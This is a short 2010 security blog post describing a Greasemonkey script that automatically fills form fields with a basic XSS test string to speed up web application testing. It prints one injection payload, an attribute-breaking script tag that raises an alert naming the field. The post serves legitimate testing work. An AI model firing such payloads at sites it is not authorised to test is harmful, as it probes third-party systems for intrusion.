Sunday, March 28, 2010

Basic XSS AutoFill Script

Sometimes its nice to just browse through a site you are testing and quickly enumerate obvious XSS issues.  And by obvious, I mean cut and dry, no cleverness needed.  But then you encounter a large form and have to fill out the twenty fields with your test script. You hit submit and realize that 6 of them are vulnerable. Blah, now you have to go back and put in an individual alert message for each field to identify which of those 20 fields are the vulnerable ones.

I finally got tired of this and created a nice little grease monkey script.  You can download it here.

After you load it into grease monkey the script will automatically update all fields with the following basic xss test:
"><script>alert('NameOfElement')</script>

The following html elements are effected:
  • text boxes
  • text areas
  • drop down menus
  • hidden fields
I also added a few items the are skipped, mainly fields that are called 'action' or 'token'. You can change this as you see fit.

The script will modify the mentioned elements for every page you view. So make sure to turn it off after you are done testing.


-Michael Coates